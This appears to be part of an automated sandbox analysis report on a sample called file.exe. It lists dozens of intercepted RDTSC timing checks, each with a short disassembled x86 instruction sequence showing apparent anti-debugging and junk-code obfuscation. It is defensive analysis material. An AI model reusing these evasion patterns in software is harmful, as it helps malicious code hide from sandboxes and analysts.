Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC5C2 second address: CEC636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jp 00007F2B4CC6E2BAh 0x00000011 jmp 00007F2B4CC6E2B4h 0x00000016 nop 0x00000017 jno 00007F2B4CC6E2ACh 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F2B4CC6E2A8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b cmc 0x0000003c mov dword ptr [ebp+122D36AFh], edx 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push ebx 0x00000046 pushad 0x00000047 popad 0x00000048 pop ebx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEA7A1 second address: CEA7A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC636 second address: CEC63C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEA7A5 second address: CEA7D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2B4D4AC9F0h 0x0000000c jne 00007F2B4D4AC9E6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2B4D4AC9EEh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC63C second address: CEC640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEA7D5 second address: CEA7ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CED48C second address: CED491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEC775 second address: CEC805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F2B4D4AC9EEh 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push ebx 0x0000000f mov ebx, dword ptr [ebp+122D35E6h] 0x00000015 pop ebx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d movzx edi, ax 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F2B4D4AC9E8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 call 00007F2B4D4AC9F0h 0x00000046 mov di, cx 0x00000049 pop ebx 0x0000004a sbb ebx, 4ECBE1CAh 0x00000050 mov eax, dword ptr [ebp+122D001Dh] 0x00000056 xor dword ptr [ebp+122D17E1h], edi 0x0000005c push FFFFFFFFh 0x0000005e push eax 0x0000005f pushad 0x00000060 jg 00007F2B4D4AC9F2h 0x00000066 jmp 00007F2B4D4AC9ECh 0x0000006b jns 00007F2B4D4AC9ECh 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CEE431 second address: CEE437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF0386 second address: CF03A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F5h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF13E8 second address: CF13F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF05E2 second address: CF05E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF34EA second address: CF3523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007F2B4CC6E2B9h 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF3523 second address: CF3529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF4433 second address: CF443D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2B4CC6E2ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF443D second address: CF44B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F2B4D4AC9F3h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F2B4D4AC9E8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 jmp 00007F2B4D4AC9F3h 0x0000002c push 00000000h 0x0000002e xor bh, FFFFFFDFh 0x00000031 push 00000000h 0x00000033 add dword ptr [ebp+122D2CF4h], ebx 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b jl 00007F2B4D4AC9F4h 0x00000041 jmp 00007F2B4D4AC9EEh 0x00000046 push eax 0x00000047 push edx 0x00000048 ja 00007F2B4D4AC9E6h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF44B4 second address: CF44B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF36E4 second address: CF3701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2B4D4AC9F8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF44B8 second address: CF44C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF256F second address: CF2575 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF44C6 second address: CF44E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF44E2 second address: CF44F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9EDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF5423 second address: CF542D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2B4CC6E2A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF4686 second address: CF468A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF542D second address: CF544B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F2B4CC6E2B1h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF544B second address: CF54B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F2B4D4AC9E6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1BF1h], edx 0x00000013 push 00000000h 0x00000015 mov dword ptr [ebp+122D1F3Dh], eax 0x0000001b push 00000000h 0x0000001d jmp 00007F2B4D4AC9F9h 0x00000022 mov dword ptr [ebp+1244B46Ah], eax 0x00000028 push eax 0x00000029 pushad 0x0000002a jmp 00007F2B4D4AC9F6h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F2B4D4AC9F5h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF5613 second address: CF5617 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF73C2 second address: CF73C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF65F9 second address: CF660B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2B4CC6E2A8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF73C6 second address: CF73D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF660B second address: CF660F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF831D second address: CF8321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF92AB second address: CF92C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jns 00007F2B4CC6E2B4h 0x0000000d pushad 0x0000000e js 00007F2B4CC6E2A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF8467 second address: CF846E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CF947D second address: CF9492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jl 00007F2B4CC6E2A8h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CFD11F second address: CFD150 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F0h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F2B4D4AC9F8h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D03551 second address: D03572 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2B4CC6E2A6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2B4CC6E2B1h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D071A6 second address: D071AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D071AC second address: D071B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E1B4 second address: D0E1E9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2B4D4AC9F2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d jng 00007F2B4D4AC9E6h 0x00000013 jmp 00007F2B4D4AC9F5h 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E1E9 second address: D0E1EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E1EF second address: D0E1F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E1F5 second address: D0E1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0E1F9 second address: D0E222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F9h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F2B4D4AC9E6h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D984 second address: D0D98C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D98C second address: D0D9D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F2B4D4AC9F3h 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 jc 00007F2B4D4AC9E6h 0x00000019 jo 00007F2B4D4AC9E6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 jg 00007F2B4D4AC9E6h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0D9D5 second address: D0D9DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0DB24 second address: D0DB28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0DB28 second address: D0DB46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2B4CC6E2B8h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0DB46 second address: D0DB64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9F8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0DB64 second address: D0DB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0DB68 second address: D0DBB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007F2B4D4ACA01h 0x00000015 jp 00007F2B4D4AC9F2h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0DD2C second address: D0DD41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2ACh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0DEB6 second address: D0DEBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13724 second address: D1374A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 jmp 00007F2B4CC6E2AFh 0x0000000d jc 00007F2B4CC6E2A6h 0x00000013 pop ebx 0x00000014 jc 00007F2B4CC6E2ACh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1374A second address: D13754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13754 second address: D13774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007F2B4CC6E2A6h 0x0000000e jmp 00007F2B4CC6E2B2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D138D4 second address: D138D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D138D9 second address: D13916 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 je 00007F2B4CC6E2B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2B4CC6E2B5h 0x00000017 js 00007F2B4CC6E2A6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13916 second address: D13920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13920 second address: D13924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13924 second address: D1394F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F2B4D4AC9ECh 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13C72 second address: D13C7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13C7A second address: D13C7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D13C7E second address: D13C82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D1408E second address: D14095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D143A7 second address: D143AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D143AC second address: D143B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D143B2 second address: D143B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D146A1 second address: D146D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F2B4D4AC9F8h 0x00000012 je 00007F2B4D4AC9E6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D146D1 second address: D146D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D146D7 second address: D146EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9EFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D146EA second address: D146F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCBB34 second address: CCBB38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCBB38 second address: CCBB60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F2B4CC6E2AEh 0x0000000e jmp 00007F2B4CC6E2ACh 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCBB60 second address: CCBB87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2B4D4AC9F2h 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007F2B4D4AC9E6h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CCBB87 second address: CCBBAE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F2B4CC6E2B8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F2B4CC6E2ABh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE87E4 second address: CE88B9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2B4D4AC9E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], ebx 0x0000000d mov dword ptr [ebp+122D2434h], ebx 0x00000013 mov dword ptr [ebp+1244BB87h], ecx 0x00000019 push dword ptr fs:[00000000h] 0x00000020 add dword ptr [ebp+1246064Fh], ecx 0x00000026 mov dword ptr fs:[00000000h], esp 0x0000002d push ecx 0x0000002e sub edi, 1D1E0D30h 0x00000034 pop edi 0x00000035 mov dword ptr [ebp+124864FDh], esp 0x0000003b mov edi, dword ptr [ebp+122D3330h] 0x00000041 cmp dword ptr [ebp+122D2AF7h], 00000000h 0x00000048 jne 00007F2B4D4ACAC8h 0x0000004e push 00000000h 0x00000050 push ebp 0x00000051 call 00007F2B4D4AC9E8h 0x00000056 pop ebp 0x00000057 mov dword ptr [esp+04h], ebp 0x0000005b add dword ptr [esp+04h], 00000014h 0x00000063 inc ebp 0x00000064 push ebp 0x00000065 ret 0x00000066 pop ebp 0x00000067 ret 0x00000068 mov byte ptr [ebp+122D1CA5h], 00000047h 0x0000006f push 00000000h 0x00000071 push ebx 0x00000072 call 00007F2B4D4AC9E8h 0x00000077 pop ebx 0x00000078 mov dword ptr [esp+04h], ebx 0x0000007c add dword ptr [esp+04h], 00000017h 0x00000084 inc ebx 0x00000085 push ebx 0x00000086 ret 0x00000087 pop ebx 0x00000088 ret 0x00000089 mov eax, D49AA7D2h 0x0000008e jc 00007F2B4D4AC9E6h 0x00000094 call 00007F2B4D4AC9ECh 0x00000099 jmp 00007F2B4D4AC9F3h 0x0000009e pop edi 0x0000009f push eax 0x000000a0 push eax 0x000000a1 push edx 0x000000a2 jne 00007F2B4D4AC9F5h 0x000000a8 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE8D55 second address: CE8D69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2B4CC6E2ACh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE8FBE second address: CE8FC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE9137 second address: CE914D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CE914D second address: CE9153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
